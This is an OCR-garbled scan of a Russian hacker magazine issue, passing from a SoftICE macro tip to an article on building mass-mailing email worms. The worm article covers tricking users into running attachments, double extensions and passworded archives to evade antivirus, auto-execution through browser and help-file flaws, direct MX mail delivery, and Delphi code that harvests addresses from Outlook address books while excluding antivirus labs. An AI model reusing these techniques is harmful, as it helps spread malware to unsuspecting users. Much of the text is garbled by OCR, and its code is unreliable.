А именно — возможность пошаговой анимированной трассировки с ус- 
ловными точками останова на каждом ходу. Например, можно поста- 
вить точку останова на конструкцию ТЕЗТ ЕАХ,ЕАХА1х ХХХ', заставив 
отладчик всплывать всякий раз, когда ЕАХ будет равен нулю или любо- 
му другому значению на наш выбор. Что-то вроде 'ВРХ ІР 
(*ѵѵогсІ(ЕІР)==0хС085 && (*ЬуІе(ЕІР+2) & 70Ь)==70Ь)'. Здесь 0хС085 — оп- 
код команды ТЕЗТ ЕАХ, ЕАХ, а 70Ь — маска инструкции Лх, ну а вся точ- 
ка останова в целом позволяет отлавливать код типа "і( 
(Іипс(1,2,3)!=0)...", которые часто используется в защитных механизмах. 
ЗоШСЕ таких шуток не понимает и требует, чтобы адрес точки оста- 
нова был задан явно, например 'ВРХ ЕІР...', но и в этом случае он 
создает одну единственную точку останова, опираясь на текущее 
значение ЕІР (каким оно было в момент создания точки останова) и 
отказываясь автоматически «пересчитывать» его по ходу следова- 
ния программы. Какая жалость! А ведь ради этой возможности мно- 
гие хакеры отказываются от привычного ЗоШСЕ и мигрируют в сто- 
рону ОІІуОЬд. Между тем, решение есть! 

Макросы могут быть вложенными! Попробуйте написать 'МАСРЮ 
ХѴ2="Т; ХѴ2; 1 ", наберите ХѴ2 и посмотрите что получится. ЗоШСЕ нач- 
нет анимировать программу! Не слишком быстро, но все-таки достаточ- 
но производительно. Во всяком случае, для распаковки навесных упа- 
ковщиков вполне подойдет. 

Коль скоро мы научились анимировать программу, создание условных 
точек уже не станет проблемой. Вот, например, такой полезный макрос: 
'МАСРЮ ХѴ2 = "ВРХ ЕІР;Т;ХѴ2;"'. Что он делает? А вот что! Он выделя- 
ет трассу следования программы, помечая выполненный код, и мы сра- 
зу видим, какие условные переходы выполнялись, а какие нет. Только 
необходимо учитывать, что количество точек останова ограниченно, 
и потому их периодически необходимо снимать. 

[заключение] ЗоШСЕ — это действительно мощный инструмент не- 
обыкновенной разрушительной силы, который позволяет делать все, 
что нужно. Главное — фантазию иметь. Русский мужик всегда отличал- 
ся умением собирать из всяких подручных средств потрясающие вещи. 
Вот так и с отладкой. Вместо того чтобы искать отладчик, реализующий 
необходимый нам функционал, мы можем взять в руки напильник и до- 
работать уже существующий, тем более что логгинг — это не един- 
ственная альтернативная профессия ЗоШСЕ. При желании из него 
можно соорудить отличный дампер или что-то еще. Но это тема уже 
другого разговора. 

Главное — схватить идею. Эта статья не предлагает готовых решений, 
но зато поднимает целый пласт возможностей, которые каждый может 
использовать по своему усмотрению © 
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Разводим червей 



Что такое мыльные черви, и с чем их едят 



ТАКОЕ ЯВЛЕНИЕ, КАК МАССОВОЕ 
РАСПРОСТРАНЕНИЕ ЧЕРВЕЙ В СЕТИ 
КОСНУЛАСЬ, ДУМАЮ, ЛЮБОГО. НА- 
ВЕРНЯКА ТЫ УЖЕ ЗНАЕШЬ ТАКИХ 
СЕТЕВЫХ ПРЕДСТАВИТЕЛЕЙ БЕС- 
ПОЗВОНОЧНЫХ, КАК ВЕАОЬЕ И 
МѴЭООМ, ОНИ ЗАРАЗИЛИ СОТНИ 
ТЫСЯЧ МАШИН И НАДЕЛАЛИ НЕМА- 
ЛО ШУМА. МОЖЕТ БЫТЬ, ТЫ ДУМА- 
ЕШЬ, ЧТО СДЕЛАТЬ САМОМУ ПО- 



ДОБНОГО ЗВЕРЯ ОЧЕНЬ ТРУДНО? 
ЭТО НЕ ТАК, МЫЛЬНЫЙ ЧЕРВЬ НА 
САМОМ ДЕЛЕ НЕ ПРЕДСТАВЛЯЕТ 
СОБОЙ НИЧЕГО СЛОЖНОГО. И В 
ЭТОЙ СТАТЬЕ Я ЭТО ПОПЫТАЮСЬ 
ДОКАЗАТЬ, РАССКАЗАВ ТЕБЕ О 
ПРИНЦИПАХ ФУНКЦИОНИРОВАНИЯ 
МЫЛЬНЫХ ЧЕРВЕЙ И ОБ ОСОБЕН- 
НОСТЯХ ИХ РЕАЛИЗАЦИИ. НО ХОЧУ 
ТЕБЯ СРАЗУ ПРЕДОСТЕРЕЧЬ, ЧТО 



[как работает червь?] Общий принцип работы всех мыльных червей — 
это рассылка писем, в аттачах которых находится копия червя, предназ- 
наченная юзеру. Наверно, ты думаешь, что это вздор, аттачи сейчас ник- 
то не запускает. Однако статистика говорит, что приложения в сомни- 
тельных письмах запускает 2 — 3% пользователей, а этого вполне доста- 
точно для успешного распространения червей. После запуска червь ка- 
ким-либо образом прописывает себя в автозагрузку. Следующим этапом 
работы червя является поиск всех е-таіі адресов на зараженной маши- 
не, они извлекаются из адресной книги ОиІІоок (либо других почтовых 
программ) и ищутся в НітІ-, іхі- и бос-файлах по всем дискам заражен- 
ной машины. Третьим этапом жизни червя является рассылка себя по 
всем найденным адресам. Все это с первого взгляда кажется примитив- 
ным, но на всех этапах есть множество важных тонкостей, которые нуж- 
но обязательно учесть для того, чтобы червь стал жизнеспособным. Не- 
обходимо заставить сервер принять письмо, а пользователя запустить в 



ЧЕРВИ ЧРЕЗВЫЧАЙНО ОПАСНЫ, ПО- 
ЭТОМУ ОБРАЩАТЬСЯ С НИМИ НАДО 
СО ВСЕЙ ОСТОРОЖНОСТЬЮ, ИНАЧЕ 
МОЖНО НАДЕЛАТЬ БЕД И ЗАГРЕ- 
МЕТЬ ЗА РЕШЕТКУ. ТАК ЧТО ВСЕ НА- 
ПИСАННОЕ В ЭТОЙ СТАТЬЕ СЛЕДУ- 
ЕТ ИСПОЛЬЗОВАТЬ ТОЛЬКО В УЧЕБ- 
НЫХ ЦЕЛЯХ. В ОБЩЕМ, НАЧИНАЕМ 
РАЗВОДИТЬ ЧЕРВЕЙ 

I Мз-Вет (Мз-Вет@уапсІех.ги) 



аттач. Нетривиальной также будет борьба с антивирусами, спамфильт- 
рами почтовых систем, файрволами и различными фильтрами аттачей в 
таіі-клиентах. Короче говоря, проблем у червеписателей хватает. Итак, 
приступим к рассмотрению всех этапов жизни червя по порядку. 

Начнем с самого важного, по моему мнению, вопроса, который возника- 
ет при создании червя: как заставить юзера запустить аттач? В первую 
очередь нужно обойти проблемы технического характера, главной из 
которых может быть запрет открытия исполняемых файлов почтовой 
программой. Уже давно прошли времена, когда можно было смело по- 
сылать на мыло ехе-файл и надеяться, что пользователь его запустит. 
Сейчас даже самый тупой юзер (на которого и рассчитаны мыльные 
черви) не запустит такой аттач по той причине, что ему не даст это сде- 
лать почтовая программа, либо письмо будет удалено фильтром вложе- 
ний файрвола. Первое, что приходит на ум, — это засунуть исполняе- 
мый файл в архив. Почтовые фильтры не рискнут удалять такие аттачи, 




АВТОЗАПУСК АТТАЧА 

Недостаток большинства мыльных червей в 
том, что для их запуска нужны действия пользо- 
вателя. Но этого можно избежать, если исполь- 
зовать уязвимости в почтовом ПО. Наиболее 
популярный в народе почтовый клиент — 
ОіЛІоок Ехргезз при просмотре ІіітІ-писем ис- 
пользует движок Іпіегпеі Ехріогег. Всем извест- 
но, что этот движок отличается исключительной 
дырявостью. На ІЕ было выпущено множество 
эксплойтов, запускающих код на уязвимой ма- 
шине, и большинство их можно использовать 
для автозапуска червя при открытии письма! За 
такую замечательную возможность нам нужно 
поблагодарить Билла Гейтса, а разработчикам 
ІЕ нужно памятник при жизни поставить за то, 
что они сделали в нем много удобных для ис- 
пользования дыр :). 

Очень странно, что эту возможность использует 
очень мало червей. Как пример можно привес- 
ти червя ѴѴіпеѵаг. Червяк этот очень старый 
(еще 2002 года), но отличается от большинства 
других червей тем, что использует дырку іРгате 
и запускается при просмотре письма в окне 
быстрого просмотра ОиІІоок. Это, конечно, кру- 
то, но есть возможность лучше. Наверное, ты 
слышал о существовании іред-эксплойта. Су- 
ществование этого эксплойта связано с ошиб- 
кой в обработке іред-файлов в системной биб- 
лиотеке, что позволяет заразить комп через 
любую программу, показывающую іред-картин- 
ки! Это можно использовать не только в 
ОіЛІоок, но и в других почтовых клиентах, таких 
как ТНеВаі или Еибога. На диске ты найдешь 
исходник этого эксплойта, но, к сожалению, в 
настоящее время он срабатывает мало у кого. 
Эксплойты — это, конечно, хорошо, но, к сожа- 
лению, не всегда можно найти что-то реально 
рабочее, поэтому стоит присмотреться к другим 
методам маскировки червя в письме. Если в 
письма слать ехе-файл, то мало кто его запус- 
тит, так как юзеры стали осторожнее. Но боль- 
шинство из них даже не подозревает, что опас- 
ность может скрываться в .Гіір- и .сііт-файлах. 
Одна из малоизвестных возможностей Гіеір- 
файлов — выполение сценариев на простом 
скриптовом языке, причем эти сценарии позво- 
ляют запускать исполнимые файлы. Эту воз- 
можность можно использовать с высокой эф- 
фективностью, так как доверия к Ыр-файлам 
намного больше, чем к ехе. Неір-файлы можно 
создавать в Неір ѴѴогкзІпор (входит в состав М3 
ѴізиаІ Зіисііо 6). Инфу по скриптовому языку 
можно прочитать в документации к этой прог- 
рамме. В качестве демонстрации этого метода 
на диске лежит Иеір-файл, запускающий 
стсі.ехе. Но не составит никакого труда сделать 
хэлп, который форматирует винт ;). 




исходничек іред-сплоита 



а юзеру нетрудно будет открыть та- 
кой архив и запустить файл. Если на 
архив также поставить пароль и за- 
писать его в тексте письма, то будут 
пасовать и антивирусы на почтовых 
серверах, однако процент заражений 
несколько снизится. 

Допустим, нам удалось создать ат- 
тач, который проходит все таіі- 
фильтры и успешно попадает к поль- 
зователю. Теперь возникает задача 
заставить юзера его запустить. Из- 
давна для этого используют социаль- 
ную инженерию, то есть обычный 
развод. Для этого в письме пишут, 
что оно содержит зесигііу ирбаіез или 
еще какою-нибудь полезную прог- 
рамму. Также распространен метод 
создания в архивах файлов с двой- ЬедІП 
ными расширениями, при этом файл 
обычно имеет расширение .хіз [очень 
много пробелов]. ехе и иконку доку- 
мента МісгозоК ЕхсеІ. Часто трояны в 
аттачах имеют расширение .ріТ, кото- 
рое не отображается в Эксплорере 
даже тогда, когда включено отобра- 
жение расширений всех файлов. 

Что такое червь, и как он должен ра- 
ботать, думаю, тебе понятно. Теперь 
приступим непосредственно к рас- 
смотрению технических вопросов, 
которые возникают в процессе соз- 
дания беспозвоночных. 

[релеинг и резолвинг] Проблема 
№1, которую нам нужно решить, — 
это сама отсылка копии червя на е- 
таіі адрес. В статье «Методы управ- 
ления ВАТ», в июльском номере, я 
рассматривал процесс отправки мы- 
ла через ЗМТР-сервер таіі.ги. Такой 
метод отправки подходит для раз- 
личных парольных троянов, но для 
массовой рассылки червей неприме- 
ним. Потому что для его работы нуж- 
но иметь один или несколько посто- 
янно работающих ЗМТР-серверов, 
через которые будет идти почта. Я 
думаю, ты уже понял, что такие сер- 
веры мгновенно прикроют доступ к 
себе, как только червя обнаружат, да 
и вряд ли какой-то ЗМТР сможет вы- 
держать нагрузку, даваемую тысяча- 
ми распространяющихся червей. По- 
этому нам нужно отправлять почту, 
минуя центральный ЗМТР-сервер. 

Что происходит с письмом, отправлен- 
ным через какой-нибудь зтір.таіі.ги ? 

В этом случае сервер маил.ру работа- 
ет, как ЗМТР Веіау, то есть как пере- 
направитель сообщения от клиента на 
ЗМТР-сервер получателя. А зачем в 
цепочке рассылки лишний элемент, 
ведь можно отправлять почту напря- 
мую получателю, минуя ЗМТР Веіау. 

Как же нам узнать адрес ЗМТР серве- 
ра получателя? Это очень просто! Ад- 
рес ЗМТР, принимающего почту в ка- 
ком-либо домене, всегда определяет- 
ся соответствующей МХ-записью для 
этого домена на ЭЫЗ-серверах. 

Для начала нам нужно сделать ре- 
золвинг МХ-записи нужного домена. 
Реализуется это двумя способами. 

Первый — написание своего ЭІЧЗ 
Везоіѵег'а, который бы формировал 
запрос, посылал его серверу, прини- 



мал и декодировал ответ. Второй — использо- 
вать для этого ЭІЧЗ АРІ. Второй вариант, конеч- 
но, гораздо проще, но он имеет один большой 
недостаток — функции ЭЫЗ АРІ появились 
только в ѴѴіпбоѵѵз 2000 РгоІеззіопаІ (в не Рго 
версиях они отсутствуют!), а так как основным 
контингентом пользователей, заражаемых поч- 
товыми червями, будут ламеры, сидящие на 
старых и необновленных системах, то такой 
метод резолвинга лучше не использовать. Од- 
нако для ознакомления с ЭЫЗ АРІ, я приведу 
код, резолвящий МХ-записи. 

Іипсііоп МХВезоІѵефотаіп: РСІіаг): зігіпд; 
ѵаг 

рйиегуРезиІІзЗеІ: Р0І\ІЗ_ВЕС0РЮ; 
НозІЕпІ: РНозІЕгф 
Мате: РСІіаг; 

рОиегуВезиІІзЗеІ := піі; 

і! ОпзОиегуфотаіп, 0І\ІЗ_ТѴРЕ_МХ, 
ОМЗ.ОиЕВѴ.ЗТАШАРЮ, піі, 
@р0иегуВезиІІ53еІ, піі) = 0 Феп 

Ьедіп 

ВезиІІ := рбиегуРІезиІІзЗеФ.ОаІа. 

МХ.рІМатеЕхсІіапде; 

6ІоЬаІРгее(сІ\А/огсІ(рОиегуВе5иІІ53еІ)); 

епф 

епсі; 

Как ты видишь, резолвить с помощью ЭЫЗ АРІ 
проще простого, но так как этот метод не всег- 
да приемлем, перейдем к рассмотрению следу- 
ющего метода. 

[ручной РЫ8 резолвинг] Я попытаюсь рас- 
сказать немного о ЭЫЗ-протоколе. Я не ставлю 
перед собой цели подробно рассказывать обо 
всей системе, но попытаюсь дать основные по- 
нятия, необходимые для понимания этого про- 
токола. Подробно ты можешь все прочитать в 
документации РРС 1034 и 1035. 

БЫЗ-запросы бывают разного типа. Тип запро- 
са имеет числовое значение от 1 до 16 и опре- 
деляет информацию, которую вы желаете по- 
лучить. Номер типа ответа всегда соответству- 
ет номеру типа запроса, чтобы знать, что и к 
чему относится. Вот основные типы ОЫЗ-зап- 
росов: 



01 


А 


Ііозі асісігезз (ІР адрес хоста) 


02 


N3 


аиФогіІаІіѵе пате зегѵег 






(N3 сервер) 


03 


ІѴЮ 


таіі сіезііпаііоп 






(устар.тип, сейчас юзают МХ) 


04 


МР 


таіі Тогѵѵагсіег 






(устар.тип, сейчас юзают МХ) 


05 


СІМАМЕ 


Фе сапопісаі пате Тог аііаз 


06 


30А 


тагкз о! а зТагТ о! іопе о? аиШогіІу 


07 


МВ 


(ехрегітепТаІ) 


08 


Мб 


(ехрегітепТаІ) 


09 


МВ 


таіі гепате сіотаіп пате 


10 


І\ІІЛ_І_ 


а пиІІ РІВ 


11 


ѵѵкз 


а ѵѵеІІ кпоѵѵп зегѵісе сІезсгірТіоп 


12 


РТВ 


а сіотаіп пате роіпТег 


13 


НІІМР0 


ИозТ іпТогтаТіоп 


14 


МІІМР0 


таіі Ьох ог таіі МзТ ІпТогтаТіоп 


15 


мх 


таіі ехсііапде 


16 


тхт 


ТехТ зТгіпд 



Из них нас интересуют только МХ-записи, име- 
ющие номер 1 5. Наряду с типом запроса, суще- 
ствует еще и класс запроса. Это связано с тем, 
что протокол ЭІМЗ универсален и может рабо- 
тать практически в любых сетях, а не только в 
ТСР/ІР. Так как другие сети нам не понадобят- 
ся, нас будет интересовать только один класс 
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запросов — ІЫ (=1), который предназначен для использования в Интер- 
нете. Пакет запроса имеет следующий вид: 

Раскеі І_епдіЬ — 2 байта 
Оиегу/Везропзе Ьеабег — 1 2 байтов 

Оиезііоп — нет фиксированной длины, зависит от количества вопросов 
Апзѵѵег — формируется сервером, нет фиксированной длины 
АиИіопІу — формируется сервером, нет фиксированной длины 
АбсШіопаІ — формируется сервером, нет фиксированной длины 
Запрос должен включать в себя І_епдІГі, Неасіег и Оиезііоп, а ответ 
может иметь все поля, но поле Апзѵѵег в нем является обязательным. 
Теперь определим структуру, описывающую заголовки Оиегу/Везропзе 
Неасіег: 

ТОІМЗНеасІег = раскесі гесогсі 

дгуЮ : ѵѵогсі; — идентификатор запроса 
орііопз: ѵѵогсі; — флаги 

дсісоипі: ѵѵогсі; — счетчик записей в поле Оиезііоп 
апсоипі: ѵѵогсі; — счетчик записей в поле Апзѵѵег 
пзсоипі: ѵѵогсі; — счетчик записей в поле АіШіогіІу 
агсоипі: ѵѵогсі; — счетчик записей в поле АсШіопаІ 
епсі; 

ТОиегуТуре = раскесі гесогсі 

СГГуре : ѵѵогф — тип запроса 
ОСІазз: ѵѵогсі; — класс запроса 
епсі; 



Іипсііоп 6еШІ\Іате(ѵаг Весѵйаіа; ОІІзеІ: Іпіедег; ѵаг РТ Роіпіег): зігіпд; 
ѵаг 

СЬРІ : РСІіаг; 

ВеасІВуІез : Вуіе; 

Ьедіп 

ВезиІІ := 

СЬРІ := @ВесѵОаІа; 

Іпс(СЬРІ, ОІІзеІ + 1); 
ѵѵЬіІе СЬРІ Л о " сіо 
Ьедіп 

і! СЬРІ Л = #$С0 Шеп 
Ьедіп 

Іпс(СЬРІ); 

ВезиІІ :=ВезиІІ + ОеЮІ\Іате(ВесѵОаІа, ОгсІ(СЬРІ л ) - 1, РІ); 
Вгеак; 
епсі еізе 
Ьедіп 

ВеасІВуІез := ОгсІ(СЬРІ л ); 
ѵѵЬіІе ВеасІВуІез > 0 сіо 
Ьедіп 

Іпс(СЬРІ); 

РезиІІ := РезиІІ + зІгіпд(СЬРІ л ); 

0ес(ВеасШу{ез); 

епф 

епф 

Іпс(СЬРІ); 

іі (СЬРІ Л о ") іЬеп ВезиІІ := ВезиІІ + 
епсі; 

Р* := СЬРІ; 
епф 

Так как объем статьи не позволяет рассмотреть процесс МХ-резол вин- 
та целиком, то я рассмотрю здесь только еще один важный момент — 
получение ІР ОЫЗ-сервера, через который мы будем слать запросы. 
В этом нам поможет функция (ЗеІІМеІѵѵогкРагатз из ірГіІрарі.сІІІ. Эта 
функция возвращает различную информацию о сетевых адаптерах, в 
том числе и адреса, связанных с ними ОЫЗ. 



Чтобы получить адрес ЗМТР-сервера, куда мы хотим послать письмо, мы 
должны составить запрос, послать его, принять и декодировать ответ. Со 
структурой запроса, я думаю, все понятно, давай теперь разберемся с возв- 
ращаемыми ответами, а для этого надо разобраться, что такое ВВ-записи. 
Они формируются ЫЗ-сервером и располагаются только в ответе и строго 
следом за полем запроса. То есть Апзѵѵег и все последующие состоят из не- 
которого количества ВВ-записей различного формата. В них передаются в 
качестве информации и ІР-адреса, и названия серверов, и просто текстовая 
информация. Подробно все типы этих записей приведены в ВРС 1035, они 
довольно похожи друг на друга и различаются лишь мелкими деталями. 
Так что я буду говорить только об интересующих меня. Аббревиатура ВВ 
означает Везоигсе Весогб (это официальное название из документа). 
ВВ-запись выглядит так: 

ІМАМЕ ир Іо 255 Ьуіез + 1 ('\0') 

ТУРЕ 2 Ьуіез (ШІМТ) 

СЬАЗЗ 2 Ьуіез (ШІМТ) 

ТТІ_ 4 Ьуіез (зідпесі 32 Ьііз питЬег — 'Іопд') 

ВОІ_ЕІМСіТН 2 Ьуіез (ІІІІМТ) 

РЮАТА ѵагіаЫе, Ьерепсі оп диегу 

Где ІМАМЕ — название хоста, к которому относится запись, ТУРЕ — тип 
представляемой информации (о типах см. выше), СІ_АЗЗ — класс сети 
(в нашем случае всегда 'ІІМ' (01)), ТТІ_ — время хранения информации в 
секундах, ВОІ_ЕІ\ЮТН — длина блока информации в байтах, ВОАТА — 
блок представляемой информации. 

Самой главной проблемой при декодировании ответа будет разбор возв- 
ращаемых имен хостов. Имя хоста состоит из нескольких частей. Перед 
каждой частью ставится байт, определяющий ее длину. Например, 
ѵѵѵѵѵѵ.тісгозоП.сот будет выглядеть как 03 ѵѵѵѵѵѵ 09 тісгозоК 03 сот 00, 
имя всегда оканчивается нулевым байтом. Но самая главная фича не в 
этом, а в том, что имя может быть упаковано. Упаковывают имя, исполь- 
зуя указатель, он представляет собой два байта, причем первый исполь- 
зуется в качестве семафора, два старших бита этого семафора установ- 
лены в 1, а остальные не определены. Второй байт является смещением 
от начала запроса, то есть от первого байта идентификатора. Если байт 
длины равен $00, то следующий за ним байт будет указателем (кошмар 
— прим. догГа). Напишем функцию, декодирующую такие имена: 



Іипсііоп 6еЮІ\ІЗЗегѵег(): сіѵѵогсі; 
ѵаг 



РіхесІІпТоЗіге 

РіхесІІпТо 

РйІМЗ 

ѲеШеІѵѵогкРагатз 



: Іпіедег; 

: РРіхесІІпТо; 

: РІРАсІсІгЗІгіпд; 

: ІипсІіоп(РІ:РРіхес1ІпІо; 



ѵаг ВиІІ_еп: Іпіедег): Іпіедег; зісісаіі; 



Ьедіп 

ВезиІІ := 0; 

СеШеІѵѵогкРагатз := 6еІРгосАс1с1ге55(Іоас11іЬгагу( , ірЫрарі.с1ІГ), 
'ОеШеІѵѵогкРагатз'); 

іі @6еІІМеІ\л/огкРагатз = піі ІЬеп Ехіі; 

РіхесІІпТоЗіге := 1024; 

6еШет(РіхесІІпІо, РіхесІІпТоЗіге); 
і! 6еШеІѵѵогкРагатз(Ріхес1ІпІо, 

РіхесІІпТоЗіге) = ЕВРЮВ_ЗІІССЕЗЗ Шеп 

Ьедіп 

РЭІМЗ := @РіхесИпІо л .ОІ\ІЗЗегѵегІ_і5І; 
і! РйІМЗ о піі Шеп ВезиІІ := іпеІ_ас!с1г(Р0ІМЗ л .ІРАсІсІге55); 
епсі; 

РгееМет(РіхесІІпТо); 

епф 

Работающий пример МХ-резолвера ты можешь найти на диске. 

[получение адресов для рассылки] Перед тем как начинать рас- 
сылку копий червя, неплохо было бы определить адреса, по которым мы 
будем его рассылать. Для этого нам нужно сначала вытащить все адре- 
са из адресной книги юзера, а затем и просканировать все файлы на 
дисках на их наличие. 

Попробуем для начала достать адреса из адресной книги ОиІІоок. Нуж- 
ная нам информация хранится в .ѵѵаЬ файлах, и ввиду их простой стук- 
туры будет нетрудно их распарсить вручную. Вот пример кода, сохраня- 
ющего все адреса из ѵѵаЬ-файла в файл ЕтаіІз.М: 
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іс-ч^с СС!]0«,ТЦЧЫ 

лтрнй Щ.МИПО& 

глііг.ѵі -п: ■ ■"і 1 
н тгч-і ^і-І^50Р 

ИЕ-Л>.*3ч- 



*'іН .Г и 



игры с дымом 






І 
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выл та ижапй 



ІЭ 



АніЙ>*і № 
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ргосесіиге ВеасіѴѴАВ(ѴѴАВРіІе: зігіпд); 
ѵаг 

Р : ТМе; 

I : сіѵѵогсі; 

3 : зігіпд; 

N : аггау[1..5] оі Сііаг; 

ВиТ : аггау[1..500] о! СІіаг; 

В : ТехІРіІе; 

Ьедіп 

А 55 ідпРіІе(В,'ЕтаіІ 5 .М'); 

ВеѴѴгіІе(В); 

АззідпРіІе(Р,ѴѴАВРіІе); 

ВезеІ(Р, 1 ); 

іі ІОВезиІЬО Іііеп Ьедіп 
гереаі 

ВІоскРіеасІ(Р,І\І,2); 
і! І\І[1]+І\І[2]=#03#48 Іііеп Ьедіп 

ВІоскРІеас](Р,ВиІ,Огс](І\І[2])+30); 

5 :="; 

Іог І:=1 Іо ОгсІ(Ы[2])+30 сіо 3:=3+ВиІ[І]; 

ОеІеІе(3,1,3); 

І:=Роз(#00#00#00,3); 

іі І>0 Іііеп ЗеІІ_епдІіі(3,М); 

Іог І:=1 Іо ОгЩІ\І[2]) сіо іі 3[І]=#00 ІЬеп 
0еіеІе(3,І,1); 

Іог І:=1 Іо І_епдІіі(3) сіо 

іі 3[1]<сЬг(45) ІЬеп Ьедіп 
ЗеІІ_епдІЬ(3,М); 

Вгеак; 

епф 

іі (Роз('@ , , 3 )> 0 )апсІ(Ро 5 ( , . , , 3 )> 0 ) ІЬеп 
\л/гіІеІп(г,ІіррегСазе(3)); 
епсі еізе Зеек(Р,РіІеРоз(Р)-1); 
ипііі РіІеЗі 2 е(Р)-РіІеРоз(Р)< 6 ; 

СІозеРіІе(Р); 

епсі; 

СІозеРіІе(В); 

епсі; 

Ну, и совсем просто будет извлечь адреса из ѴѴіпсІоѵѵз Меззепдег, так как 
они просто хранятся в реестре, в разделе НКЕѴ_СІІВВЕІ\ІТ_ІІЗЕВ\ 
ЗоІІѵѵагеХМісгозоІШеззепдегЗегѵісеМізЮасПеѴЫЕТ Меззепдег Зегѵісе, от- 
куда их можно прочитать, просто перечислив соответствующие ключи. Как 
это сделать, я думаю, ты и сам догадаешься. 

Следующим этапом после адресных книг будет поиск мыл в файлах на дис- 
ке. Сделать это очень просто, поэтому приводить примеров я не буду, но подс- 
кажу, что для реализации этого тебе хватит АРІ-функций РіпсІРігзІРМе, 
РіпсІМехІРіІе, РіпсІСІозе, СгеаІеРіІе, ВеасІРіІе и СІозеНапсІІе, ну и еще обязатель- 
но понадобится немного мозгов (они пригодятся для того, чтобы сообразить, 
как использовать регулярные выражения для поиска мыл — прим. догГа). Ко- 
нечно, помимо этого, можно извлекать адреса из адресных книг других прог- 
рамм, можно даже использовать кейлогер и отслеживать вводимые юзером 
данные, все эти приемы повышают эффективность червя и увеличивают ско- 
рость его размножения. Очень важный момент при получении списка адресов 
— это его фильтрация. Ты ведь не хочешь, чтобы твой червь сам отправился 
прямиком в лабораторию Касперского, поэтому следует сделать список слов- 
исключений, которые не должны встречаться в адресах, пригодных для рас- 
сылки. Все адреса с этими словами просто следует не включать в базу. 

[создание аттачей в письме] В статье про управление трояном я рас- 
сматривал простейшую отправку письма и процесс ЗМТР-чата, но не рас- 
сматривал процесс отправки аттачей в тексте письма. Начнем с того, что ат- 
тачи передаются не в бинарном виде, а в текстовом. Связано это с тем, что 
изначально ЗМТР/РОРЗ протоколы предназначались исключительно для пе- 
редачи текста и работали не с байтами, а с 7-битными символами, что позво- 
ляло передавать только знаки латинского алфавита. Все символы, не попа- 
дающие в этот диапазон, обрезаются почтовым сервером до 7 бит, что вы- 
нуждает нас перед передачей кодировать бинарные данные в специальный 
формат. В свое время было придумано множество вариантов кодирования 
(ІІІІЕ, ХХЕ, Вазе64), но прижился и с успехом используется сейчас только 
формат Вазе64. Давай кратко рассмотрим принципы кодирования Вазе64. 
Как известно, байт состоит из восьми битов. Один байт может принимать 256 
значений: от 0 до 255. Однако если вместо восьми байт использовать толь- 
ко шесть, то объем вложенной информации уменьшается до 64 значений: от 
О до 63. Теперь главное: любую цифру 6-ти битового байта можно предста- 
вить в виде печатного символа. 64 символа это не так много, АЗСІІ-символов 
вполне хватит, что позволяет закодировать все данные в следующий набор: 




аттач в письме 



АВСОЕРбНМКІМЫОРаРЗТІІѴѴѴХУ^аЬссІеІдИіікІтпордгзІиѵѵѵхугОІ 234 
56789+/ 

А далее берутся три последовательных байта по восемь бит (всего 24 
бита) и побитно делятся на четыре 6-ти битных байта (всего 24 бита). 
Немного странно звучит, «шестибитный байт». На самом деле бит во- 
семь, однако используются только 6 младших бит, два старших бита иг- 
норируются. Основываясь на этом принципе, мы можем закодировать лю- 
бую двоичную информацию в текст, не очень сильно увеличивая ее объ- 
ем (на 30%). Затем наша информация через почтовый сервер попадет к 
нужному адресату, почтовик которого декодирует текст в двоичный файл. 
Готовый пример Вазе64-кодирования ты найдешь на диске с журналом. 
Но просто вставить Вазе64-код в текст письма недостаточно. Для того что- 
бы почтовая программа распознала этот текст как аттач, нужно сформиро- 
вать соответствующие заголовки. В начало письма обязательно нужно 
вставить заголовки МІМЕ-Ѵегзіоп и СопІепІ-Туре, первый определяет вер- 
сию МІМЕ (мы будем использовать 1 .0), а второй — тип содержимого пись- 
ма и разделители между МІМЕ-элементами. Перед самими Вазе64-данны- 
ми должен быть вставлен блок, описывающий тип этих данных, имя фай- 
ла в аттаче и тип его кодирования. Выглядеть это будет примерно так: 

МІМЕ-Ѵегзіоп: 1.0 

СопІепІ-Туре: тиііірагі/тіхесі; Ьоипсіагу="_===13023223====_" 

-_===1 3023223====_ 

СопІепІ-Туре: ІехІ/рІаіп; сИагзеІ="\л/іпсіо\л/з-1 251 ІогтаІ="ІІо\л/есІ" 
СопІепІ-ТгапзІег-ЕпсосІіпд: 8 ЫІ 

[Текст письма] 

— _===1 3023223====_ 

СопІепІ-Туре: арріісаііоп/осіеі-зігеат 
СопІепШзрозіІіоп: аііасіітепі; 

ІіІепате="Іго]ап.ехе" 

СопІепІ-ТгапзІег-ЕпсосІіпд: Ьазе64 

... здесь идут Вазе64 данные... 

С тем, как добавить файл в аттач, я думаю, все понятно. Так как все пе- 
ресылаемые файлы мы будем паковать в архив, то давай разберемся, 
как можно его создать. Самым простым и лучшим способом будет ис- 
пользование внешнего архиватора, например, если на компе юзера уста- 
новлен ѴѴіпВаг, то архив создается всего одной строкой: ѴѴіпЕхес('гаг.ехе 
а -г баіа.гаг Ігоіап.ехе', ЗѴѴ_НЮЕ). Подобным образом можно использо- 
вать и другие архиваторы, но, к сожалению, не у всех на компе стоит хоть 
какой-нибудь архиватор. В таком случае нам ничего не остается, кроме 
как создавать архивы вручную. Но так как париться со сжатием, я думаю, 
тебе не хочется, то будем использовать библиотеку МасІ2ір, которая поз- 
воляет полноценно работать с 2ІР-архивами, и при этом добавляет в ис- 
полнимый файл всего 20 Кб веса. Библиотека как всегда на диске с жур- 
налом, с ней очень легко разобраться, честное слово. 

Итак, суть работы червей и некоторые моменты их реализации я постарал- 
ся здес описать. Приведенной здесь информации, конечно, недостаточно 
для того, чтобы вызвать новую эпидемию, но все что для этого нужно ты 
можешь легко изучить сам (но не в коем случае не делай этого — это пло- 
хо!). Для начала советую найти в сети исходники Веадіе и МуОоот и вни- 
мательно их изучить, затем прочесть и понять ВЕС на ЗМТР и МІМЕ-про- 
токолы. Нужно разбираться в психологии для того, чтобы заставить боль- 
шое количество юзеров запустить аттач. И весьма неплохо было бы доба- 
вить к червяку какой-нибудь полиморф. Но я все равно надеюсь, что новой 
эпидемии не будет, так как каждый, кто разберется в этой теме до конца, 
не станет тратить свои знания на бесполезное уничтожение, а лучше ис- 
пользует их для написания общественно полезного софта. Верно © 
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Предел мобильности! 

Как куются мобильные сайты 



МНОГИЕ ОПЕРАТОРЫ МОБИЛЬНОЙ СВЯЗИ 
ПЫТАЮТСЯ ПРИВЛЕЧЬ СВОИХ КЛИЕНТОВ 
АКЦИЯМИ ВРОДЕ «ЧИТАЙ СВОЮ ПОЧТУ ПРЯМО 
